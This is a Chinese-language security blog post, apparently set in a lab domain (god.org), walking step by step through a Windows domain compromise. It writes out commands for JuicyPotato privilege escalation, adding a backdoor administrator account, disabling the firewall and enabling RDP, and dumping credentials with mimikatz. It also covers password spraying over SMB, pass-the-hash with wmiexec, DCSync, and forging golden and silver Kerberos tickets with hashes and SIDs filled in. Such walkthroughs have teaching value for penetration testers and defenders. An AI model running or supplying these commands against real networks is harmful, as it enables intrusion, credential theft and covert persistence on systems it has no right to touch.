域内黄金白银票据

Fscan扫到了域内的机器有数据低权限

图片[1],域内黄金白银票据,网络安全爱好者中心-神域博客网
图片[2],域内黄金白银票据,网络安全爱好者中心-神域博客网

激活xp_cmdshell 此时为低权限

图片[3],域内黄金白银票据,网络安全爱好者中心-神域博客网

四家土豆家族全部GG

工具梭不了 我们手动打

图片[4],域内黄金白银票据,网络安全爱好者中心-神域博客网

最后用JuicyPotato.exe(为什么选这个 2012首先推荐的就是GodPotato 其次是JuicyPotato)

C:\Users\Public\JuicyPotato.exe -t * -l 1337 -p cmd.exe -a “/c whoami

图片[5],域内黄金白银票据,网络安全爱好者中心-神域博客网

添加管理员后门到管理组

C:\Users\Public\JuicyPotato.exe -t * -l 1337 -p cmd.exe -a "/c net user test abc!123456 /add && net localgroup administrators test /add"

关闭防火墙开启3389

C:\Users\Public\JuicyPotato.exe -t * -l 1337 -p cmd.exe -a “/c netsh advfirewall set allprofiles state off && reg add \”HKLM\System\CurrentControlSet\Control\Terminal Server\” /v fDenyTSConnections /t REG_DWORD /d 0 /f && net start TermService”

此时就可以直接远程桌面连接了也是管理员权限

上传

图片[6],域内黄金白银票据,网络安全爱好者中心-神域博客网

dump哈希值(需要管理员权限,此时我们已经是管理员了)

privilege::debug 提权到调试权限

图片[7],域内黄金白银票据,网络安全爱好者中心-神域博客网

sekurlsa::logonPasswords 抓取登录过的明文密码、NTLM 哈希、PIN 码、密钥

sekurlsa::msv就算没有明文密码,也能抓到哈希,用来横向移动、PTH 哈希传递(是专门只输出 “纯哈希)可选

因为输出太多 我们直接让他输出到output里

mimikatz.x64.exe “privilege::debug” “sekurlsa::logonPasswords” “sekurlsa::msv” “exit” > output.txt

图片[8],域内黄金白银票据,网络安全爱好者中心-神域博客网

抓到了两个账号 一个是当前管理员的账号的哈希 另一个是域里面的哈希

疑问 为什么没有抓到我们之前test的账号

因为猕猴桃抓的是缓存,test都没有登录过所以没抓到

抓到administrator的哈希值了此时我们就可以去解密了

图片[9],域内黄金白银票据,网络安全爱好者中心-神域博客网

查询出来管理员的账号密码是admin!@#45

这个就是我们要收集的密码本

使用admin!@#45去喷洒SMB

fscan.exe -h 192.168.3.1/24 -user administrator -pwda admin!@#45 -m smb

图片[10],域内黄金白银票据,网络安全爱好者中心-神域博客网

成功喷洒出来另一台哈希值,即使是复杂密码也可以喷洒出来 如果另一个主机是高价值主机/双网卡主机

那么此时我们就具备了横向的条件

如果密码很复杂解密不出来使用wmiexec进行PTH哈希传递

wmiexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.31 “whoami”

图片[11],域内黄金白银票据,网络安全爱好者中心-神域博客网

这样也可以执行命令

域管也有弱口令

010拿下两台机器 其中一台win7

图片[12],域内黄金白银票据,网络安全爱好者中心-神域博客网

域内信息搜集使用sharpHound

图片[13],域内黄金白银票据,网络安全爱好者中心-神域博客网

bloodhood分析

图片[14],域内黄金白银票据,网络安全爱好者中心-神域博客网
图片[15],域内黄金白银票据,网络安全爱好者中心-神域博客网

Adfinder也可以查询

查找域控

图片[16],域内黄金白银票据,网络安全爱好者中心-神域博客网

查找域用户

图片[17],域内黄金白银票据,网络安全爱好者中心-神域博客网

主要来到黄金票据和白银票据域内

黄金票据

黄金票据(Golden ticket)

在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个 Logon Session Key和TGT,而Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash,就可以伪造TGT和Logon Session Key来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。

黄金票据常用于权限维持。 当我们获得域控的控制权限后,有可能获取域内所有用户的hash,和krbtgt的hash。这时,由于一些原因导致我们失去对目标的控制权,但是我们还留有一个普通用户的权限,并且krbtgt的密码没有更改,此时我们可以利用krbtgt用户的ntlm hash制作黄金票据伪造tgt,重新获取域控的管理权限。

所需条件

1、域名称

2、域的SID值

3、域的KRBTGT账号的HASH

4、伪造任意用户名 (获取域的SID和KRBTGT账号的NTLM HASH的前提是需要已经拿到了域的权限)

导出所有哈希

lsadump::dcsync /domain:god.org /all /csv

图片[18],域内黄金白银票据,网络安全爱好者中心-神域博客网

SID

图片[19],域内黄金白银票据,网络安全爱好者中心-神域博客网

这个时候就可以做黄金票据了

kerberos::golden /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /aes256:5a75bb9a4fc4453c66621a54af111884f45bbca6365bf4d81bc059f31e708827 /user:Administrator /ptt

把这个黄金票据导入低权限域用户里

图片[20],域内黄金白银票据,网络安全爱好者中心-神域博客网

通过klist查看是否当前系统有黄金票据凭证

图片[21],域内黄金白银票据,网络安全爱好者中心-神域博客网

可以看到有域控的票据了

这样低权限的就可以维权域控的了

图片[22],域内黄金白银票据,网络安全爱好者中心-神域博客网

可以pxexec/wmic执行域控机器的命令

图片[23],域内黄金白银票据,网络安全爱好者中心-神域博客网

白银票据

白银票据是kerberos认证协议的一种攻击手法,与“黄金票据”相对应,它是一种伪造服务票证的攻击,用于攻击已攻陷特定服务器机器账户密码哈希(NTLM哈希)的情况下,直接向服务器进行身份验证,从而访问特定资源。

kerberos::golden:使用minikatz中票据的功能

/domain:指定域名,例如 demo.local

/sid:Client端查询的sid号,在域控中查询也可以,都是一样的,例如S-1-5-21-2708067078-2949266822-4175191696-1105

/target:主域控中的计算机全名

/rc4:在域控中抓取的hash(NTLM)

/service:需要伪造的服务(cifs只是其中的一种服务,可伪造的服务很多)

/user:需要伪造的用户名(可自定义)

/ppt:伪造了以后直接写入到内存中

kerberos::golden /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:OWA2010CN-God.god.org /service:cifs /rc4:0beb8ee951c8a5407a2e71988e9d597c /user:Administrator /ptt

/service:cifs CIFS = Common Internet File System,Windows 文件共享服务

注入白银票据之后也可以访问域控文件

不同的这个白银票据只有文件共享不能执行其他命令了。

白银票据缺陷

  1. 不能远程执行命令(PsExec、wmic 不行,需要 host 服务票据)
  2. 不能查询 AD、DCSync(需要 ldap 服务票据)
  3. 不能远程桌面、管理服务
  4. 不能访问其他机器(FILESERV\(、SQLSERVER\) 等都不行)
图片[24],域内黄金白银票据,网络安全爱好者中心-神域博客网

AES的是黄金票据 RC4注入的是白银票据

这里注入的白银票据是文件共享服务 只可以文件共享 适合拿下单主机的时候维权更加隐秘 但权限不如黄金票据

图片[25],域内黄金白银票据,网络安全爱好者中心-神域博客网
------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容

    暂无评论内容